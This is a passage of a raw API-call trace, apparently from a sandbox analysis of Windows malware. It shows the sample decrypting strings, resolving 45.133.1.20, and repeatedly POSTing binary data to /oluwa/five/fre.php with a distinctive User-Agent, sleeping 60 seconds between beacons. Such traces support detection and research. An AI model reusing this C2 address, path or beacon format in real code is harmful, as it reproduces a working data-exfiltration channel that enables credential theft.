hHeap=0x6a0000) returned 1 [0311.077] send (s=0xbd4, buf=0x6bd460*, len=242, flags=0) returned 242 [0311.078] send (s=0xbd4, buf=0x6bb998*, len=159, flags=0) returned 159 [0311.078] GetProcessHeap () returned 0x6a0000 [0311.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0311.078] recv (in: s=0xbd4, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0311.160] GetProcessHeap () returned 0x6a0000 [0311.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0311.161] GetProcessHeap () returned 0x6a0000 [0311.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0311.162] GetProcessHeap () returned 0x6a0000 [0311.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df628 | out: hHeap=0x6a0000) returned 1 [0311.162] GetProcessHeap () returned 0x6a0000 [0311.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0311.163] closesocket (s=0xbd4) returned 0 [0311.164] GetProcessHeap () returned 0x6a0000 [0311.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0311.164] GetProcessHeap () returned 0x6a0000 [0311.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0311.164] GetProcessHeap () returned 0x6a0000 [0311.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0311.165] GetProcessHeap () returned 0x6a0000 [0311.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0311.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1914) returned 0xbd4 [0311.168] Sleep (dwMilliseconds=0xea60) [0311.174] GetProcessHeap () returned 0x6a0000 [0311.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0311.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.178] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.230] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0311.305] GetProcessHeap () returned 0x6a0000 [0311.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0311.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.307] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0311.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.341] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.343] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.343] GetProcessHeap () returned 0x6a0000 [0311.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0311.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.345] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0311.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.346] CryptDestroyKey (hKey=0x6ad020) returned 1 [0311.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.347] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0311.347] GetProcessHeap () returned 0x6a0000 [0311.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0311.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.348] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.350] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.351] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.352] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.352] GetProcessHeap () returned 0x6a0000 [0311.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0311.352] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.353] GetProcessHeap () returned 0x6a0000 [0311.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0311.353] GetProcessHeap () returned 0x6a0000 [0311.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0311.354] GetProcessHeap () returned 0x6a0000 [0311.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0311.354] GetProcessHeap () returned 0x6a0000 [0311.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0311.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.355] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0311.464] GetProcessHeap () returned 0x6a0000 [0311.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0311.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.466] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0311.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.467] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.468] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.468] GetProcessHeap () returned 0x6a0000 [0311.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0311.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.469] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0311.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.479] CryptDestroyKey (hKey=0x6ad020) returned 1 [0311.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.480] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0311.480] GetProcessHeap () returned 0x6a0000 [0311.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0311.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.481] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0311.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.481] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0311.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.482] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0311.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.483] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0311.483] GetProcessHeap () returned 0x6a0000 [0311.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0311.483] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0311.483] GetProcessHeap () returned 0x6a0000 [0311.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0311.483] socket (af=2, type=1, protocol=6) returned 0xbd8 [0311.484] connect (s=0xbd8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0311.508] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0311.508] GetProcessHeap () returned 0x6a0000 [0311.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0311.508] GetProcessHeap () returned 0x6a0000 [0311.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0311.509] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0311.511] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0311.511] GetProcessHeap () returned 0x6a0000 [0311.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dfce8 [0311.511] GetProcessHeap () returned 0x6a0000 [0311.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0311.512] GetProcessHeap () returned 0x6a0000 [0311.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0311.512] GetProcessHeap () returned 0x6a0000 [0311.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0311.513] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0311.513] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0311.513] GetProcessHeap () returned 0x6a0000 [0311.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0311.513] GetProcessHeap () returned 0x6a0000 [0311.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0311.514] send (s=0xbd8, buf=0x6bd460*, len=242, flags=0) returned 242 [0311.514] send (s=0xbd8, buf=0x6bb998*, len=159, flags=0) returned 159 [0311.514] GetProcessHeap () returned 0x6a0000 [0311.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0311.514] recv (in: s=0xbd8, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0311.587] GetProcessHeap () returned 0x6a0000 [0311.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0311.588] GetProcessHeap () returned 0x6a0000 [0311.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0311.589] GetProcessHeap () returned 0x6a0000 [0311.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dfce8 | out: hHeap=0x6a0000) returned 1 [0311.589] GetProcessHeap () returned 0x6a0000 [0311.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0311.590] closesocket (s=0xbd8) returned 0 [0311.590] GetProcessHeap () returned 0x6a0000 [0311.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0311.590] GetProcessHeap () returned 0x6a0000 [0311.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0311.591] GetProcessHeap () returned 0x6a0000 [0311.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0311.591] GetProcessHeap () returned 0x6a0000 [0311.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0311.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1918) returned 0xbd8 [0311.604] Sleep (dwMilliseconds=0xea60) [0311.606] GetProcessHeap () returned 0x6a0000 [0311.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0311.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.607] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0311.637] GetProcessHeap () returned 0x6a0000 [0311.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0311.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.648] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0311.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.649] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.650] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.650] GetProcessHeap () returned 0x6a0000 [0311.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0311.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.652] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0311.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.653] CryptDestroyKey (hKey=0x6ad020) returned 1 [0311.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.654] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0311.654] GetProcessHeap () returned 0x6a0000 [0311.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0311.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.655] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.658] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.659] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.660] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.660] GetProcessHeap () returned 0x6a0000 [0311.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0311.660] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.660] GetProcessHeap () returned 0x6a0000 [0311.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0311.661] GetProcessHeap () returned 0x6a0000 [0311.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0311.661] GetProcessHeap () returned 0x6a0000 [0311.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0311.662] GetProcessHeap () returned 0x6a0000 [0311.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0311.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.663] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.673] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0311.681] GetProcessHeap () returned 0x6a0000 [0311.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0311.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.683] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0311.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.684] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.685] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.685] GetProcessHeap () returned 0x6a0000 [0311.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0311.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.689] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0311.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.694] CryptDestroyKey (hKey=0x6ad020) returned 1 [0311.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.696] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0311.696] GetProcessHeap () returned 0x6a0000 [0311.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0311.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.698] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0311.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.700] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0311.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.710] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0311.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.712] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0311.712] GetProcessHeap () returned 0x6a0000 [0311.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0311.712] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0311.712] GetProcessHeap () returned 0x6a0000 [0311.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0311.712] socket (af=2, type=1, protocol=6) returned 0xbdc [0311.713] connect (s=0xbdc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0311.740] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0311.740] GetProcessHeap () returned 0x6a0000 [0311.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0311.740] GetProcessHeap () returned 0x6a0000 [0311.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0311.741] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0311.742] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0311.742] GetProcessHeap () returned 0x6a0000 [0311.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6def68 [0311.742] GetProcessHeap () returned 0x6a0000 [0311.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0311.743] GetProcessHeap () returned 0x6a0000 [0311.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0311.743] GetProcessHeap () returned 0x6a0000 [0311.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0311.744] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0311.745] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0311.745] GetProcessHeap () returned 0x6a0000 [0311.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0311.745] GetProcessHeap () returned 0x6a0000 [0311.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0311.745] send (s=0xbdc, buf=0x6bd460*, len=242, flags=0) returned 242 [0311.746] send (s=0xbdc, buf=0x6bb998*, len=159, flags=0) returned 159 [0311.746] GetProcessHeap () returned 0x6a0000 [0311.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0311.746] recv (in: s=0xbdc, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0311.815] GetProcessHeap () returned 0x6a0000 [0311.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0311.815] GetProcessHeap () returned 0x6a0000 [0311.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0311.816] GetProcessHeap () returned 0x6a0000 [0311.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def68 | out: hHeap=0x6a0000) returned 1 [0311.817] GetProcessHeap () returned 0x6a0000 